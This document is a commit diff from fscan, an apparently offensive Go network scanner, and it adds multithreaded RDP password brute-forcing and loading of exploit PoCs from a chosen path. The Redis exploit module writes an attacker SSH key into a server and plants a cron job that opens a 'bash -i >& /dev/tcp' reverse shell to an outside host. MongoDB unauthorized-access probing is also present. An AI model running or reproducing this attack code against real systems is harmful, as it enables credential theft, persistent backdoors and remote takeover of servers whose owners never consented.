poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破dem…

…o, -br xx指定线程
shadow1ng · Apr 20, 2022 · 4c51ae1 · 4c51ae1
1 parent d1ff896
commit 4c51ae1
Show file tree

Hide file tree

Showing 19 changed files with 344 additions and 133 deletions.
diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go
@@ -13,6 +13,7 @@ func MongodbScan(info *common.HostInfo) error {
  if common.IsBrute {
  return nil
  }
+
  _, err := MongodbUnauth(info)
  if err != nil {
  errlog := fmt.Sprintf("[-] Mongodb %v:%v %v", info.Host, info.Ports, err)
@@ -23,8 +24,7 @@ func MongodbScan(info *common.HostInfo) error {
 
 func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
  flag = false
- senddata := []byte{58, 0, 0, 0, 167, 65, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 255, 255, 255, 255, 19, 0, 0, 0, 16, 105, 115, 109, 97, 115, 116, 101, 114, 0, 1, 0, 0, 0, 0}
- getlogdata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
+ senddata := []byte{72, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 212, 7, 0, 0, 0, 0, 0, 0, 97, 100, 109, 105, 110, 46, 36, 99, 109, 100, 0, 0, 0, 0, 0, 1, 0, 0, 0, 33, 0, 0, 0, 2, 103, 101, 116, 76, 111, 103, 0, 16, 0, 0, 0, 115, 116, 97, 114, 116, 117, 112, 87, 97, 114, 110, 105, 110, 103, 115, 0, 0}
  realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
  conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
  defer func() {
@@ -49,21 +49,10 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) {
  return flag, err
  }
  text := string(buf[0:count])
- if strings.Contains(text, "ismaster") {
- _, err = conn.Write(getlogdata)
- if err != nil {
- return flag, err
- }
- count, err := conn.Read(buf)
- if err != nil {
- return flag, err
- }
- text := string(buf[0:count])
- if strings.Contains(text, "totalLinesWritten") {
- flag = true
- result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
- common.LogSuccess(result)
- }
+ if strings.Contains(text, "totalLinesWritten") {
+ flag = true
+ result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost)
+ common.LogSuccess(result)
  }
  return flag, err
 }
diff --git a/Plugins/postgres.go b/Plugins/postgres.go
@@ -46,7 +46,7 @@ func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, e
  defer db.Close()
  err = db.Ping()
  if err == nil {
- result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
+ result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
  common.LogSuccess(result)
  flag = true
  }

diff --git a/Plugins/rdp.go b/Plugins/rdp.go
@@ -22,46 +22,88 @@ import (
  "time"
 )
 
+type Brutelist struct {
+ user string
+ pass string
+}
+
 func RdpScan(info *common.HostInfo) (tmperr error) {
  if common.IsBrute {
  return
  }
- starttime := time.Now().Unix()
+
+ var wg sync.WaitGroup
+ var signal bool
+ var num = 0
+ var all = len(common.Userdict["rdp"]) * len(common.Passwords)
+ var mutex sync.Mutex
+ brlist := make(chan Brutelist, all)
+ port, _ := strconv.Atoi(info.Ports)
+
  for _, user := range common.Userdict["rdp"] {
  for _, pass := range common.Passwords {
  pass = strings.Replace(pass, "{user}", user, -1)
- port, err := strconv.Atoi(info.Ports)
- flag, err := RdpConn(info.Host, info.Domain, user, pass, port)
- if flag == true && err == nil {
- result := fmt.Sprintf("[+] RDP:%v:%v:%v %v", info.Host, info.Ports, user, pass)
- common.LogSuccess(result)
- return err
+ brlist <- Brutelist{user, pass}
+ }
+ }
+
+ for i := 0; i < common.BruteThread; i++ {
+ wg.Add(1)
+ go worker(info.Host, info.Domain, port, &wg, brlist, &signal, &num, all, &mutex, info.Timeout)
+ }
+
+ close(brlist)
+ go func() {
+ wg.Wait()
+ signal = true
+ }()
+ for !signal {
+ }
+
+ return tmperr
+}
+
+func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brutelist, signal *bool, num *int, all int, mutex *sync.Mutex, timeout int64) {
+ defer wg.Done()
+ for one := range brlist {
+ if *signal == true {
+ return
+ }
+ go incrNum(num, mutex)
+ user, pass := one.user, one.pass
+ flag, err := RdpConn(host, domain, user, pass, port, timeout)
+ if flag == true && err == nil {
+ var result string
+ if domain != "" {
+ result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass)
  } else {
- errlog := fmt.Sprintf("[-] rdp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
- common.LogError(errlog)
- tmperr = err
- if common.CheckErrs(err) {
- return err
- }
- if time.Now().Unix()-starttime > (int64(len(common.Userdict["rdp"])*len(common.Passwords)) * info.Timeout) {
- return err
- }
+ result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass)
  }
+ common.LogSuccess(result)
+ *signal = true
+ return
+ } else {
+ errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
+ common.LogError(errlog)
  }
  }
- return tmperr
 }
 
-func RdpConn(ip, domain, user, password string, port int) (bool, error) {
+func incrNum(num *int, mutex *sync.Mutex) {
+ mutex.Lock()
+ *num = *num + 1
+ mutex.Unlock()
+}
+
+func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, error) {
  target := fmt.Sprintf("%s:%d", ip, port)
  g := NewClient(target, glog.NONE)
- err := g.Login(domain, user, password)
+ err := g.Login(domain, user, password, timeout)
 
- //var e
  if err == nil {
  return true, nil
  }
- //return true, err
+
  return false, err
 }
 
@@ -84,12 +126,16 @@ func NewClient(host string, logLevel glog.LEVEL) *Client {
  }
 }
 
-func (g *Client) Login(domain, user, pwd string) error {
- conn, err := net.DialTimeout("tcp", g.Host, 5*time.Second)
+func (g *Client) Login(domain, user, pwd string, timeout int64) error {
+ conn, err := net.DialTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
+ defer func() {
+ if conn != nil {
+ conn.Close()
+ }
+ }()
  if err != nil {
  return fmt.Errorf("[dial err] %v", err)
  }
- defer conn.Close()
  glog.Info(conn.LocalAddr().String())
 
  g.tpkt = tpkt.New(core.NewSocketLayer(conn), nla.NewNTLMv2(domain, user, pwd))
@@ -147,7 +193,6 @@ func (g *Client) Login(domain, user, pwd string) error {
  wg.Done()
  }
  })
-
  wg.Wait()
  return err
 }
diff --git a/Plugins/redis.go b/Plugins/redis.go
@@ -11,8 +11,8 @@ import (
 )
 
 var (
- dbfilename  string
- dir  string
+ dbfilename string
+ dir string
 )
 
 func RedisScan(info *common.HostInfo) (tmperr error) {
@@ -164,6 +164,10 @@ func Expoilt(realhost string, conn net.Conn) error {
  }
  }
  err = recoverdb(dbfilename, dir, conn)
+ //fmt.Println("dbfilename:")
+ //fmt.Println(dbfilename)
+ //fmt.Println("dir:")
+ //fmt.Println(dir)
  return err
 }
 
@@ -187,14 +191,19 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
  return flag, text, err
  }
  if strings.Contains(text, "OK") {
- key, err := Readfile(filename)
- if err != nil {
- text = fmt.Sprintf("Open %s error, %v", filename, err)
- return flag, text, err
- }
- if len(key) == 0 {
- text = fmt.Sprintf("the keyfile %s is empty", filename)
- return flag, text, err
+ var key string
+ if filename == "shadow" {
+ key = SshPub
+ } else {
+ key, err = Readfile(filename)
+ if err != nil {
+ text = fmt.Sprintf("Open %s error, %v", filename, err)
+ return flag, text, err
+ }
+ if len(key) == 0 {
+ text = fmt.Sprintf("the keyfile %s is empty", filename)
+ return flag, text, err
+ }
  }
  _, err = conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
  if err != nil {
@@ -246,7 +255,11 @@ func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
  return flag, text, err
  }
  if strings.Contains(text, "OK") {
- scanIp, scanPort := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
+ target := strings.Split(host, ":")
+ if len(target) < 2 {
+ return flag, "host error", err
+ }
+ scanIp, scanPort := target[0], target[1]
  _, err = conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scanIp, scanPort)))
  if err != nil {
  return flag, text, err

diff --git a/Plugins/scanner.go b/Plugins/scanner.go
@@ -56,7 +56,7 @@ func Scan(info common.HostInfo) {
  case info.Ports == "445":
  //AddScan(info.Ports, info, ch, &wg) //smb
  AddScan("1000001", info, ch, &wg) //ms17010
- AddScan("1000002", info, ch, &wg) //smbghost
+ //AddScan("1000002", info, ch, &wg) //smbghost
  case info.Ports == "9000":
  AddScan(info.Ports, info, ch, &wg) //fcgiscan
  AddScan("1000003", info, ch, &wg) //http

diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go
@@ -22,7 +22,7 @@ import (
 func WebTitle(info *common.HostInfo) error {
  err, CheckData := GOWebTitle(info)
  info.Infostr = WebScan.InfoCheck(info.Url, &CheckData)
- if common.IsWebCan == false && err == nil {
+ if common.IsWebCan == false && common.IsBrute == false && err == nil {
  WebScan.WebScan(info)
  } else {
  errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)

diff --git a/README.md b/README.md
@@ -188,6 +188,7 @@ fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-G
 除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。
 
 ## 最近更新
+[+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程 
 [+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito 
 [+] 2022/1/11 新增oracle密码爆破 
 [+] 2022/1/7 扫ip/8时,默认会扫每个C段的网关和数个随机IP,推荐参数:-h ip/8 -m icmp.新增LiveTop功能,检测存活时,默认会输出top10的B、C段ip存活数量. 

diff --git a/WebScan/WebScan.go b/WebScan/WebScan.go
@@ -6,13 +6,19 @@ import (
  "github.com/shadow1ng/fscan/WebScan/lib"
  "github.com/shadow1ng/fscan/common"
  "net/http"
+ "os"
+ "path/filepath"
  "strings"
+ "sync"
 )
 
 //go:embed pocs
 var Pocs embed.FS
+var once sync.Once
+var AllPocs []*lib.Poc
 
 func WebScan(info *common.HostInfo) {
+ once.Do(initpoc)
  var pocinfo = common.Pocinfo
  buf := strings.Split(info.Url, "/")
  pocinfo.Target = strings.Join(buf[:3], "/")
@@ -38,5 +44,55 @@ func Execute(PocInfo common.PocInfo) {
  if PocInfo.Cookie != "" {
  req.Header.Set("Cookie", PocInfo.Cookie)
  }
- lib.CheckMultiPoc(req, Pocs, PocInfo.Num, PocInfo.PocName)
+ pocs := filterPoc(PocInfo.PocName)
+ lib.CheckMultiPoc(req, pocs, PocInfo.Num)
+}
+
+func initpoc() {
+ if common.PocPath == "" {
+ entries, err := Pocs.ReadDir("pocs")
+ if err != nil {
+ fmt.Printf("[-] init poc error: %v", err)
+ return
+ }
+ for _, one := range entries {
+ path := one.Name()
+ if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+ if poc, _ := lib.LoadPoc(path, Pocs); poc != nil {
+ AllPocs = append(AllPocs, poc)
+ }
+ }
+ }
+ } else {
+ err := filepath.Walk(common.PocPath,
+ func(path string, info os.FileInfo, err error) error {
+ if err != nil || info == nil {
+ return err
+ }
+ if !info.IsDir() {
+ if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
+ poc, _ := lib.LoadPocbyPath(path)
+ if poc != nil {
+ AllPocs = append(AllPocs, poc)
+ }
+ }
+ }
+ return nil
+ })
+ if err != nil {
+ fmt.Printf("[-] init poc error: %v", err)
+ }
+ }
+}
+
+func filterPoc(pocname string) (pocs []*lib.Poc) {
+ if pocname == "" {
+ return AllPocs
+ }
+ for _, poc := range AllPocs {
+ if strings.Contains(poc.Name, pocname) {
+ pocs = append(pocs, poc)
+ }
+ }
+ return
 }